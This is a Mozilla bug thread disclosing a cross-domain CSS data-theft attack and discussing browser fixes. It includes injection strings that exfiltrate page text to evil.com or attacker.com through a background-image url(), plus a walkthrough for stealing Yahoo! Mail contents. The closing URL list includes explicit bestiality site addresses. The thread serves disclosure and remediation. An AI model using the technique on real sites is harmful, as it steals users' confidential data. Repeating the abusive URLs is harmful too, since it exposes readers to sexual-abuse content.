Bugzilla@Mozilla – Bug 524223
Cross-domain data theft using CSS
Last modified: 2010-08-20 18:36:20 PDT
From Chris Evans:

The attack involves cross-domain CSS stylesheet loading. Because the CSS parser is very lax, it will skip over any amount of preceding and following junk in its quest to find a valid selector. Here is an example of a valid selector:

body { background-image: url('http://www.evil.com/blah'); }

If a construct like this can be forced to appear anywhere in a cross-domain document, then cross-domain theft may be possible. The attacker can introduce this construct into a page by injecting two strings:

1) {}body{background-image:url('http://google.com/
(Note that the seemingly redundant {} is to resync the CSS parser, to make sure the evil descriptor parses properly. Further note that having the url start like a valid url is required to steal the text in some browsers.)
2) ');}

And anything between those two strings will then be cross-domain stealable! The data is stolen cross-domain with e.g.

window.getComputedStyle(body_element, null).getPropertyValue('background-image');

(This works in most browsers; for IE, you use ele.currentStyle.backgroundImage.)

There are a surprising number of places on internet sites where an attacker can do this. It can apply to HTML, XML, JSON, XHTML, etc. At this point, an example is probably useful. To set up for this example, you need to:

a) Get a Yahoo! Mail account.
b) Make sure you are logged into it.
c) E-mail the target victim Yahoo! account with the subject ');}
d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one.)
e) E-mail the target victim Yahoo! account with the subject {}body{background-image:url('http://google.com/
f) Send the victim to the theft page https://cevans-app.appspot.com/static/yahoocss.html
g) The stolen text shown is achieved via cross-domain CSS theft.

Other good examples I've had success with are social networking sites, where the attacker gets to leave arbitrary-text comments which are rendered on the victim's trusted page.

The main common construct that prevents exploitation is newlines. Obviously, newlines cannot be considered a defense! Escaping or encoding of quote characters can also interfere with exploitation. One useful trick: if ' is escaped, use " to enclose the CSS string.

Part 2, on possible solutions:

First, there are some solutions that are easy to reject:

1) Restrict reads of CSS text if it came from a different domain. This is a useful defense that I filed a while ago in a different bug, but it will not help in this case. The attacker can simply use http://www.attacker.com/ as a prefix for the background-image value, and wait for the HTTP GET to arrive, which includes the stolen text in the payload.
2) Do not send cookies for cross-domain CSS loads. This probably breaks a load of sites? It is certainly a riskier approach. I have not dared try it!

The solution that I'm playing with is as follows:

- Activate "strict MIME type required" in the event that the CSS was loaded (via link tag or @import) as a cross-domain resource.
- Also, crash hard if a CSS load fails due to the strict MIME type test failing.

I've been running my build locally with these changes for a few days and there seems to be some merit in this approach, i.e. my browser hasn't crashed apart from when I hit my attack URLs. I see that WebKit has a history of defaulting to "strict MIME type required" for _all_ CSS loads, and that historically broke some sites like dell.com and was reverted.
Perhaps the web at large now has its MIME types in order well enough to at least enforce strict for cross-domain CSS loads? If too much breaks, we can introduce the additional fallback of trying to parse the cross-domain CSS but bailing on the first syntax error. I'd like to avoid a test that goes that deep into nuance, however.
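For illustration, the experiment above looks roughly like this in the loader's completion path. This is a minimal sketch with assumed names (CheckStrictMimeExperiment and the aIsCrossOriginLoad flag in particular are made up, not actual Gecko API):

  #include "nsIChannel.h"   // nsIChannel::GetContentType
  #include "nsString.h"     // nsCAutoString
  #include "nsDebug.h"      // NS_ABORT

  // Sketch: enforce "strict MIME type required" only for cross-domain
  // sheet loads, and crash hard on failure as a debugging aid.
  nsresult CheckStrictMimeExperiment(nsIChannel* aChannel,
                                     PRBool aIsCrossOriginLoad) {
    nsCAutoString contentType;
    aChannel->GetContentType(contentType);
    if (aIsCrossOriginLoad && !contentType.EqualsLiteral("text/css")) {
      // "Crash hard" from the experiment above; a shipping build would
      // just refuse to parse the sheet instead.
      NS_ABORT();
      return NS_ERROR_NOT_AVAILABLE;
    }
    return NS_OK;  // same-origin, or correctly labeled: parse as usual
  }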
Marking sg:moderate, as it could lead to theft of confidential information but is mitigated by the need to inject attacker-controlled content into the page being viewed on the victim site.
(In reply to comment #0)
> Perhaps the web at large now has its MIME types in order well enough to at
> least enforce strict for cross-domain CSS loads?

This seems like something that we could try. Probably we'd want to use the eTLD service, but we could avoid doing that until we've already found that we loaded a stylesheet and it's not text/css. I suspect the big question would be whether sites like Akamai send the correct MIME type reliably.

The other question is whether we'd have a problem with the things that we now accept in standards mode: empty content-type and UNKNOWN_CONTENT_TYPE, and whether we'd need to change our handling of those in order to prevent this attack. (Probably not in most cases, but there could be some; then again, one could easily argue it's a bug in the site if it's putting content it wants interpreted in a specific way in a response with no Content-Type specified.)

The relevant code is in SheetLoadData::OnStreamComplete in nsCSSLoader.cpp, though we probably also have to worry about the hint type set in CSSLoaderImpl::LoadSheet. Boris might know more.
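In code terms, the cheap type check could gate the expensive origin check, something like this (a sketch only; the function name is made up, though UNKNOWN_CONTENT_TYPE is the real macro from nsMimeTypes.h):

  #include "nsMimeTypes.h"  // UNKNOWN_CONTENT_TYPE
  #include "nsString.h"

  // Sketch of the ordering above: only consult the eTLD/origin machinery
  // once we know the stylesheet's Content-Type is already suspect. The
  // empty type and UNKNOWN_CONTENT_TYPE are the standards-mode
  // acceptances mentioned above; whether they should remain acceptable
  // for cross-domain loads is the open question.
  PRBool TypeNeedsOriginCheck(const nsACString& aContentType) {
    return !(aContentType.EqualsLiteral("text/css") ||
             aContentType.IsEmpty() ||
             aContentType.EqualsLiteral(UNKNOWN_CONTENT_TYPE));
  }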
An update. I've crunched some data on 500,000 URLs and will have a recommendation on how to close the hole without breaking compatibility shortly :) Regarding comment #2 - I'd see it as a bug in a site if it had a missing content-type, or a poorly specified content type.
I fixed this properly in WebKit (pending review). I mined 500,000 URLs to see what sort of cross-domain CSS load + MIME braindamage exists. There's a little bit, e.g. configure.dell.com loading text/plain CSS. A bunch of sites do this. A bunch of other sites load application/octet-stream CSS, and even a fair bit of text/html CSS.

Therefore, the solution devised was to reject a CSS load if all of these are met (a sketch follows at the end of this comment):

a) It is a cross-domain load (making sure a redirect does not confuse the domain check)!
b) The MIME type is not one of the acceptable ones (text/css, application/x-unknown-content-type, or empty).
c) The alleged CSS does not start with a syntactically valid CSS construct.

The above rules will block the attack, because an HTML, XML, etc. header will always cause a broken first CSS descriptor. And the above rules are compatible: out of the 500,000 URLs, just one very broken site has its look changed a little by this change: http://practiceexam.keys2drive.ca/quiz.php, which does a cross-domain CSS load of a text/html resource which has CSS after a <style> tag. That is highly broken.

Regarding disclosure, there is no particular co-ordination. Fix and disclose when you are ready. Please credit "Chris Evans, Google Security Team". This issue will be disclosed no later than 16th April 2009, and quite probably a lot sooner.
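To make the composition of those rules concrete, here is a rough sketch; the helper FirstConstructIsValidCSS() is made up, and stands in for asking the CSS parser whether the sheet starts with a syntactically valid construct:

  // Hypothetical parser probe for condition (c); declared for the sketch.
  PRBool FirstConstructIsValidCSS(const nsAString& aSheetText);

  // Sketch of the rejection rule: all three conditions must hold, so a
  // well-labeled or same-origin sheet is never affected.
  PRBool ShouldRejectSheet(PRBool aCrossOriginAfterRedirects,  // (a)
                           const nsACString& aMimeType,        // (b)
                           const nsAString& aSheetText) {      // (c)
    PRBool acceptableType =
      aMimeType.EqualsLiteral("text/css") ||
      aMimeType.EqualsLiteral("application/x-unknown-content-type") ||
      aMimeType.IsEmpty();
    return aCrossOriginAfterRedirects &&
           !acceptableType &&
           !FirstConstructIsValidCSS(aSheetText);
  }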
(In reply to comment #4)
> This issue will be disclosed no later than 16th April 2009, and quite
> probably a lot sooner.

16th April 2010, I hope you mean?
(In reply to comment #0)
> At this point, an example is probably useful. To set up for this example, you need:
> a) Get a Yahoo! Mail account.
> b) Make sure you are logged into it.
> c) E-mail the target victim Yahoo! account with the subject ');}
> d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one).
> e) E-mail the target victim Yahoo! account with the subject {}body{background-image:url('http://google.com/
> f) Send victim to theft page https://cevans-app.appspot.com/static/yahoocss.html
> g) The stolen text shown is achieved via cross-domain CSS theft.

I think, in a conformant CSS implementation, this will only work if there are no newlines or single quotes between the content from (e) and the content from (c), so the attack is rather constrained (though still, I think, worth fixing).
@5: Yes, 16th April 2010 as an upper bound. I wouldn't be surprised if WebKit-based browsers update sooner, though, since the WebKit patch should land tonight. I also worry that people monitor WebKit commits for additions to the LayoutTests/http/tests/security directory.

@6: Correct about newlines. Single quotes do not pose a problem for the attacker, as there is the option to enclose the CSS string within double quotes. A single quote within a double quote (and vice versa) is fine. Also, I've found that "no newlines" is quite common in data access APIs that spit out authenticated data as JSON or XML.
Not blocking 1.9.2, but we should definitely come up with a fix ASAP and backport that fix to some 1.9.2 update. The plan in comment #4 looks good to me. Zack, can you take this?
Sure, I'm already messing with the CSSLoader; this shouldn't be too hard. @cevans: would you be willing to let us have the tests you wrote for WebKit, and if so, could you attach them to this bug?
Created attachment 411763 [details] [review]
partial patch (CSSLoader changes only)

This is an incomplete patch. It compiles, and it contains the code necessary to detect the conditions laid out in comment #4 and notify the parser, but I haven't actually made the parser do anything with this yet. That's going to be rather longer and less interesting, alas. I'm asking for review on this because I'm not sure I did the cross-domain check correctly, nor in all the places where it needs to happen.

Tangentially, this patch (as with anything that touches nsICSSParser) is going to conflict with my changes in bug 523496. I'd kinda like to land that first.
Comment on attachment 411763 [details] [review]
partial patch (CSSLoader changes only)

This doesn't actually work right, since you're doing the same-origin check before you start the load. In particular, the attacker could link to his own server (same-origin for purposes of this check) and then issue an HTTP 3xx response to redirect to the server being attacked. The code here wouldn't detect that.

A better way to handle this, probably, is to compare mLoaderPrincipal (which is the principal of the entity that started the load) to |principal| (which is the principal of the stylesheet, now that we've got its data and know exactly where that came from) in SheetLoadData::OnStreamComplete. Presumably a Subsumes() check. Note that mLoaderPrincipal may be null, in which case the load wasn't triggered on behalf of any web page and should be allowed.
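Concretely, something like this inside SheetLoadData::OnStreamComplete (a minimal sketch; surrounding error handling elided, and only mLoaderPrincipal and |principal| come from the actual code):

  // Compare the principal that started the load against the principal
  // of the data we actually received, i.e. post-redirect.
  PRBool sameOrigin = PR_TRUE;
  if (mLoaderPrincipal) {
    // A null mLoaderPrincipal means a UA/chrome-initiated load, which
    // is always allowed; only check when it is non-null.
    nsresult rv = mLoaderPrincipal->Subsumes(principal, &sameOrigin);
    if (NS_FAILED(rv)) {
      sameOrigin = PR_FALSE;
    }
  }
  if (!sameOrigin) {
    // Cross-origin sheet: this is where the stricter handling being
    // developed in this bug would kick in.
  }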
Oh, and if you want to land this on branches you need a version that doesn't go on top of bug 523496 anyway, right?
As requested, I'll upload the WebKit patch (including test) that is currently in-review.
Created attachment 411823 [details] [review]
WebKit patch for reference
An update on disclosure: since this is a tricky issue, I guarantee there will be no disclosure prior to Dec 28th 2009. If you want to fix this sooner than that -- please do, and push your fix out to users. Just refrain from mentioning this in the release notes or security notes. Non-prominent disclosure via source repository comments is fine.
(In reply to comment #11)
> (From update of attachment 411763 [details] [review])
> This doesn't actually work right, since you're doing the same-origin check
> before you start the load. In particular, the attacker could link to his own
> server (same-origin for purposes of this check) and then issue an HTTP 3xx
> response to redirect to the server being attacked. The code here wouldn't
> detect that.

I was afraid there might be a problem like that. Thanks.

> A better way to handle this, probably, is to compare mLoaderPrincipal (which is
> the principal of the entity that started the load) to |principal| (which is the
> principal of the stylesheet, now that we've got its data and know exactly where
> that came from) in SheetLoadData::OnStreamComplete. Presumably a Subsumes()
> check. Note that mLoaderPrincipal may be null, in which case the load wasn't
> triggered on behalf of any web page and should be allowed.

Ok. That should be less invasive, too, which is nice. I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but do I have to worry about null *principals* in here as well?

(In reply to comment #12)
> Oh, and if you want to land this on branches you need a version that doesn't go
> on top of bug 523496 anyway, right?

Bleah, good point. I'll keep developing it in isolation then.
(In reply to comment #16)
> I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but
> do I have to worry about null *principals* in here as well?

|principal| is guaranteed non-null here, provided the early-return branch that logs "couldn't get principal" was not taken. I assume that's what you were asking about?

If you were asking about nsNullPrincipal, then you don't need to worry about it. mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal and that's ok. The security checks will do the right thing with that.
(In reply to comment #17)
> If you were asking about nsNullPrincipal, then you don't need to worry about
> it. mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal
> and that's ok. The security checks will do the right thing with that.

Yes, I was asking about nsNullPrincipal. Thanks for clarifying.

My other big concern at this stage is here:

@@ CSSLoaderImpl::LoadSheet
-  rv = ParseSheet(converterStream, aLoadData, completed);
+  // XXX Can we ever have a cross-domain, improper-MIME, synchronous load?
+  rv = ParseSheet(converterStream, aLoadData, completed, PR_FALSE);

I'm not clear on how synchronous loads get triggered or what they're used for. Other things in this function imply that they are only for UA sheets, so we don't have to worry about cross-domain, but I'm not sure.
(In reply to comment #18)
> I'm not clear on how synchronous loads get triggered or what they're used for.

LoadSheetSync is a public nsICSSLoader API, so any C++ code that really wants to can use it... Current consumers in mozilla-central (excluding tests) are:

* nsChromeRegistry: should only happen for chrome:// URIs
* nsHTMLEditor: should only happen for editor-provided URIs
* nsLayoutStyleSheetCache: scrollbars.css, forms.css, ua.css, quirk.css, userContent.css, userChrome.css
* nsStyleSheetService: extension-provided UA and user sheets
* nsDocumentViewer: usechromesheets attribute on chrome <xul:browser/iframe>
* nsXBLPrototypeResources: chrome:// URIs only.
* nsXBLResourceLoader: chrome:// URIs only.
* nsXMLContentSink: catalog sheets only (in practice, mathml.css)
* nsDocument: catalog sheets

If LoadSheetSync ever gets a URI under control of untrusted content, that's a serious bug, fwiw.
Created attachment 412759 [details] [review]
complete patch

Here's a complete patch with the necessary parser changes and tests. I'm not sure I implemented exactly the same parsing semantics that cevans did for WebKit, but I doubt that the precise rules matter too much. If anyone can suggest a way to avoid adding 48 tiny little files to layout/style/tests, I am all ears.

A remaining concern: does the error cleanup logic in SheetComplete() ensure that JavaScript never sees the aborted sheet, or do we need to undo actions in the parser as well?
Comment on attachment 412759 [details] [review]
complete patch

I think I'd prefer s/draconian/draconianParsing/ throughout in variable and argument names.

>+++ b/layout/style/nsCSSParser.cpp
>+// Draconian error handling is a nonstandard mode used to close a
>+// data-theft loophole. A quirks mode document can declare any Web
>+// resource to be its style sheet; regardless of that resource's MIME
>+// type, we'll try to parse it as CSS. The normal CSS error recovery
>+// rules give the attacker a fairly decent chance of finding a valid
>+// style rule or two in there

Not sure how much of that comment we should leave in when we land, if we're trying to not disclose this bug... I guess there's nothing there that describes the actual technique used here, but still, please double-check with Chris?

> and the text of that rule then becomes
>+// accessible to the attacking document via the CSSOM.

As a matter of fact, no it does not. We enforce same-origin checks on CSSOM access. What the attack here does is to get parts of the data in the attacked document into a url() production, at which point the browser sends it to a server of the attacking document's choice as part of a GET.

>+  // XXX If draconian error handling triggered, should we undo all changes
>+  // to the style sheet? nsI[CSS]StyleSheet doesn't have methods for that...

We probably need to do that, yes. Add a method? It can throw if the sheet is complete, to make sure no one but us uses it.

As far as that goes, we might kick off @import loads before we hit a parse error. Do we want to abort them? They could in theory be communicating information to the server... But again, check with Chris? It sounds like his patch only aborts if the first rule it tries to parse doesn't parse; once it's parsed a rule it just follows normal CSS error-recovery. That would seem to be sufficient to me.

I didn't look at the tests very carefully.

> does the error cleanup logic in SheetComplete() ensure that JavaScript never
> sees the aborted sheet

It does not; however, in the cross-domain case JS can't access the sheet's rules directly anyway, per above.
(In reply to comment #21)
> (From update of attachment 412759 [details] [review])
> I think I'd prefer s/draconian/draconianParsing/ throughout in variable and
> argument names.

Ok.

> >+++ b/layout/style/nsCSSParser.cpp
> >+// Draconian error handling is a nonstandard mode [...]
>
> Not sure how much of that comment we should leave in when we land if we're
> trying to not disclose this bug... I guess there's nothing there that
> describes the actual technique used here, but still please double-check
> with Chris?

Well, he's reading the bug... Chris?

> > and the text of that rule then becomes
> >+// accessible to the attacking document via the CSSOM.
>
> As a matter of fact, no it does not. We enforce same-origin checks on CSSOM
> access.

Huh, Chris said in the original description that it's a JS-based attack:

# The data is stolen cross domain with e.g.
# window.getComputedStyle(body_element, null)
#       .getPropertyValue('background-image');
# (This works in most browsers; for IE, you use
# ele.currentStyle.backgroundImage)

Maybe getComputedStyle is not a "CSSOM" access in the strict sense...?

> What the attack here does is to get parts of the data in the attacked
> document into a url() production, at which point the browser sends it to a
> server of the attacking document's choice as part of a GET.

The existing patch may not protect against that scenario, depending on when the GET fires. I *think* it never happens during parse, except maybe for @font-face, but I'm not sure that's a safe "except".

> >+  // XXX If draconian error handling triggered, should we undo all changes
> >+  // to the style sheet? nsI[CSS]StyleSheet doesn't have methods for that...
>
> We probably need to do that, yes. Add a method? It can throw if the sheet is
> complete, to make sure no one but us uses it.

It occurs to me that the only things that will get into the style sheet are from syntactically valid constructs preceding the first syntax error. It kinda sounded like Chris's proposal was for a weaker rule than the one I implemented: if the *first* construct in the document is ill-formed, bail out; otherwise do normal CSS error recovery. I could change it to be like that, and then we wouldn't need this additional sheet-rollback handling. But I'm not sure it's enough protection.

Chris, what exactly did you make WebKit do? I'm not familiar enough with WebKit's CSS parser to tell from the patch.
> Maybe getComputedStyle is not a "CSSOM" access in the strict sense...?

Ah, yeah. That's true. You can't access the rules directly, but you can observe their effect on the computed style...

> I *think* it never happens during parse

@import GETs happen during parse. Or at least the channel's asyncOpen is called during parse. @font-face is not.

> It occurs to me that the only things that will get into the style sheet are
> from syntactically valid constructs preceding the first syntax error.

Yes.

> It kinda sounded like Chris's proposal was for a weaker rule

That's the impression I got too. Looking at the attached WebKit patch, that seems to be exactly what's going on to me:

+        if (m_styleSheet && !m_hadSyntacticallyValidCSSRule)
+            m_styleSheet->setHasSyntacticallyValidCSSHeader(false);

(in "invalid block hit") and then:

+    if (crossOriginCSS && !validMIMEType && !m_sheet->hasSyntacticallyValidCSSHeader())
+        m_sheet = CSSStyleSheet::create(this, url, charset);

(which replaces m_sheet with a blank sheet). I'm not sure what sets m_hadSyntacticallyValidCSSRule; that part seems to be autogenerated lexer code.
@Zack, #22: feel free to commit whatever comments you want. If news breaks out, then so be it. Co-ordinating something like this across a million browser vendors (some of whom move at glacial speeds) is just too complicated.

@Boris, Zack, #22 & #23: it's not necessarily a JS-based attack. My demo is JS-based because that is the easiest demo. However, imagine if getComputedStyle() did not exist. The attacker can still steal the same data, because the background-image URL fetch will send the data in the GET request to evil.com.
On Mon, Nov 23, 2009 at 10:55 AM, Zack Weinberg <zweinberg@mozilla.com> wrote:
> I'm still a little confused about one nuance of the CSS cross-site data
> theft mitigation you proposed in Mozilla bug 524223. Suppose that we
> load a cross-domain URI as a style sheet, it has the wrong MIME type,
> the *first* complete construct in the file is a valid CSS rule, but
> there's a syntax error after that point. Should we still disregard the
> whole sheet? Or should we revert to regular CSS error handling if the
> first complete construct is well-formed?

The latter. The check is, in concept, a "header" check. Also, we distinguish a syntax error from a semantic error (such as an unknown property); the latter should not be considered an error.
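In other words, a parser-side flag along these lines (all names here are assumed for the sketch; compare the m_hadSyntacticallyValidCSSRule flag in the WebKit patch quoted earlier in this bug):

  #include "prtypes.h"  // PRBool

  // Sketch of the "header check": remember whether the *first* top-level
  // construct was syntactically valid; the loader can then drop a
  // cross-origin, wrong-MIME sheet whose header was not valid.
  class CSSHeaderCheck {
   public:
    CSSHeaderCheck() : mSeenFirst(PR_FALSE), mValidHeader(PR_TRUE) {}

    // Called by the parser after each top-level construct. An unknown
    // property or value is a *semantic* error -- it still parses as
    // declaration syntax -- so it counts as valid here. Only malformed
    // syntax (e.g. a leading "<!DOCTYPE html>") marks the header bad.
    void NoteConstruct(PRBool aSyntacticallyValid) {
      if (!mSeenFirst) {
        mSeenFirst = PR_TRUE;
        mValidHeader = aSyntacticallyValid;
      }
    }

    PRBool HasValidCSSHeader() const { return mValidHeader; }

   private:
    PRBool mSeenFirst;
    PRBool mValidHeader;
  };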
Comment on attachment 412759 [details] [review]
complete patch

I've thought about this for a bit, and I've decided that I don't like the idea of having different behavior based on whether the first rule (or entirety) of a style sheet parses correctly.

The first reason I think this is bad is that, in general, heuristics are bad for the platform. By heuristics, I mean complex mechanisms intended to divine intent out of existing content on the Web (such as what Opera does with media="handheld", or this). While they're fine at handling existing content (and that's what they're designed for), I think they're bad for two reasons: (1) they provide a bizarre API for future authors, who become unable to build a mental model of how the Web as a platform behaves, and (2) they make it more complex for new entrants in the Web browser market, who have to reverse-engineer these heuristics for compatibility with existing content.

Second, I don't like the implications of such a change for CSS error handling rules. CSS depends for future extensibility on the idea that new constructs added to the language will be skipped in well-defined ways. Taking this approach would break this, and make Web authors much more hesitant to use future CSS language constructs as they are added, for fear of causing entire stylesheets to be ignored in older browsers that don't support those constructs.

So, on that basis, I'm denying superreview. Instead, I think that we should take a slightly bigger short-term risk (for longer-term gain) and stop processing all cross-domain stylesheet loads with mismatched MIME types.
(In reply to comment #26)
> Instead, I think that we should take a slightly bigger short-term risk (for
> longer-term gain) and stop processing all cross-domain stylesheet loads with
> mismatched MIME types.

I'm happy with this, and will add that I was not enthusiastic about being able to get the parser changes required for cevans' proposed rule into 3.6.x. Your somewhat stricter rule, on the other hand, is much easier to implement with the parser we've got (indeed, it requires no changes to nsCSSParser at all).

cevans: from that data set you crunched, how many sites were doing MIME-mislabeled, cross-domain loads of *syntactically valid* CSS?
I'll paste in the list of URLs. This list is for URLs I found that do cross-domain CSS loads with an invalid MIME type. It's 83 URLs out of about 500,000. In the majority of cases, the CSS is syntactically valid. I think about 3 of those 83 returned syntactically _in_valid CSS, in the form of CSS surrounded by <style> and a text/html MIME type.

Note that breaking all of these URLs would have consequences. For example, configure.dell.com is regrettably broken and uses the text/plain MIME type for cross-domain CSS in its "configure your PC" pages. That would be a significant breakage, although presumably dell.com would fix it pretty damn pronto if their broken-yet-money-making site started failing to render in a browser as popular as Firefox.

Also beware that some of these URLs are porn URLs with pretty rough content. Well, I think that's clear from the text in the URLs themselves :-)

http://ads.lfstmedia.com/fbslot/slot328
http://apps.facebook.com/eltabaco/index.php
http://apps.facebook.com/yoursay/
http://configure.dell.com/dellstore/config.aspx
http://configure.la.dell.com/dellstore/config.aspx
http://configure.la.dell.com/dellstore/poll.aspx
http://configure.us.dell.com/dellstore/DiscountDetails.aspx
http://configure.us.dell.com/dellstore/config.aspx
http://configure.us.dell.com/dellstore/print_summary_details_popup.aspx
http://date.bluesystem.ru/
http://date.bluesystem.ru/login.php
http://date.bluesystem.ru/members/
http://date.bluesystem.ru/members/who_viewed.php
http://date.bluesystem.ru/messages/
http://date.bluesystem.ru/messages/msgs.php
http://date.bluesystem.ru/photo/
http://date.bluesystem.ru/search.php
http://date.bluesystem.ru/view.php
http://date.bluesystem.ru/view_sex.php
http://forms.real.com/real/player/blackjack.html
http://forms.real.com/real/realone/realone.html
http://forum.derwesten.de/viewtopic.php
http://info.smmail.cn/jsp/service/LoginInterFace.jsp
http://jplanner.travelinenortheast.info/jpclient.exe
http://media.paran.com/entertainment/newslist.php
http://media.paran.com/entertainment/newsview.php
http://media.paran.com/sdiscuss/newshitlist.php
http://media.paran.com/sdiscuss/newsview2.php
http://media.paran.com/snews/newslist.php
http://media.paran.com/snews/newsview.php
http://month.gismeteo.ru/
http://month.gismeteo.ru/forecast.php
http://news.gismeteo.ru/news.n2
http://practiceexam.keys2drive.ca/quiz.php
http://search.chl.it/search.aspx
http://search.vampirefreaks.com/search_results.php
http://story.bluesystem.org/read.php
http://submit.123rf.com/submit/myuploaded.php
http://telefilmdb.blogspot.com/
http://www.aif.ru/
http://www.art.com/gallery/id--0/posters_p2.htm
http://www.baseball-reference.com/
http://www.baseball-reference.com/minors/player.cgi
http://www.baseball-reference.com/pl/player_search.cgi
http://www.edurang.net/uview/wrd/run/portal.show
http://www.fantatornei.com/calcio/fantalega/gestionelega.asp
http://www.google.es/ig/setp
http://www.homeportfolio.com/catalog/Listing.jhtml
http://www.pleshka.com/
http://www.smmail.cn/smmail/sy/index.html
http://www.tabelas.lancenet.com.br/Default.aspx
http://www.thongsdaily.com/
http://www.zootube365.com/
http://www.zootube365.com/animal-sex/1/
http://www.zootube365.com/animal-sex/horse-and-woman/1446/
http://www.zootube365.com/animal-sex/rochdale----does-her-pony/9740/
http://www.zootube365.com/animal-sex/woman-raped-by-pig-and-dog/2129/
http://www.zootube365.com/dog-sex/3/
http://www.zootube365.com/dog-sex/3/page/2/
http://www.zootube365.com/dog-sex/3/page/3/
http://www.zootube365.com/dog-sex/3/page/4/
http://www.zootube365.com/dog-sex/dog-cum00/11850/